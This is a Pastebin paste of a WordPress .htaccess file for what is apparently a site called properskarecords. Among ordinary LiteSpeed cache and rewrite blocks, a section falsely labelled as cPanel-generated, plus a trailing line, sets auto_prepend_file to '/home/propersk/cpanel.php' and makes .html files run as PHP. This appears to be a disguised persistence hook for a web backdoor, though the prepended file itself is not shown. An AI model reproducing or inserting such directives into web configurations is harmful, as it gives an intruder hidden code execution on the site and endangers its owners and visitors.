BaapJaan

properskarecords htaccess

Jan 6th, 2026
3,883
0
Never
15
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.73 KB | None | 0 0
  1.  
  2.  
  3. # BEGIN LSCACHE
  4. ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
  5. <IfModule LiteSpeed>
  6. RewriteEngine on
  7. CacheLookup on
  8. RewriteRule .* - [E=Cache-Control:no-autoflush]
  9. RewriteRule litespeed/debug/.*\.log$ - [F,L]
  10. RewriteRule \.litespeed_conf\.dat - [F,L]
  11.  
  12. ### marker ASYNC start ###
  13. RewriteCond %{REQUEST_URI} /wp-admin/admin-ajax\.php
  14. RewriteCond %{QUERY_STRING} action=async_litespeed
  15. RewriteRule .* - [E=noabort:1]
  16. ### marker ASYNC end ###
  17.  
  18. ### marker DROPQS start ###
  19. CacheKeyModify -qs:fbclid
  20. CacheKeyModify -qs:gclid
  21. CacheKeyModify -qs:utm*
  22. CacheKeyModify -qs:_ga
  23. ### marker DROPQS end ###
  24.  
  25. </IfModule>
  26. ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
  27. # END LSCACHE
  28. # BEGIN NON_LSCACHE
  29. ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
  30. ## LITESPEED WP CACHE PLUGIN - Do not edit the contents of this block! ##
  31. # END NON_LSCACHE
  32.  
  33. # BEGIN WordPress
  34. # The directives (lines) between "BEGIN WordPress" and "END WordPress" are
  35. # dynamically generated, and should only be modified via WordPress filters.
  36. # Any changes to the directives between these markers will be overwritten.
  37. <IfModule mod_rewrite.c>
  38. RewriteEngine On
  39. RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
  40. RewriteBase /
  41. RewriteRule ^index\.php$ - [L]
  42. RewriteCond %{REQUEST_FILENAME} !-f
  43. RewriteCond %{REQUEST_FILENAME} !-d
  44. RewriteRule . /index.php [L]
  45. </IfModule>
  46.  
  47. # END WordPress
  48. # BEGIN wtfdivi
  49.  
  50. # END wtfdivi
  51.  
  52. # BEGIN LiteSpeed
  53. # The directives (lines) between "BEGIN LiteSpeed" and "END LiteSpeed" are
  54. # dynamically generated, and should only be modified via WordPress filters.
  55. # Any changes to the directives between these markers will be overwritten.
  56. <IfModule Litespeed>
  57. SetEnv noabort 1
  58. </IfModule>
  59. # END LiteSpeed
  60.  
  61. # php -- BEGIN cPanel-generated handler, do not edit
  62. # Set the “ea-php82” package as the default “PHP” programming language.
  63. <IfModule mime_module>
  64. AddHandler application/x-httpd-ea-php82___lsphp .php .php8 .phtml
  65. </IfModule>
  66. # php -- END cPanel-generated handler, do not edit
  67.  
  68. # BEGIN cPanel-generated php ini directives, do not edit
  69. # Manual editing of this file may result in unexpected behavior.
  70. # To make changes to this file, use the cPanel MultiPHP INI Editor (Home >> Software >> MultiPHP INI Editor)
  71. # For more information, read our documentation (https://go.cpanel.net/EA4ModifyINI)
  72. <IfModule php8_module>
  73. php_value auto_prepend_file "/home/propersk/cpanel.php"
  74. </IfModule>
  75. <IfModule lsapi_module>
  76. php_value auto_prepend_file "/home/propersk/cpanel.php"
  77. </IfModule>
  78. # END cPanel-generated php ini directives, do not edit
  79. AddType application/x-httpd-php .html
  80. php_value auto_prepend_file "/home/propersk/cpanel.php"
Advertisement
Comments
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
Add Comment
Please, Sign In to add comment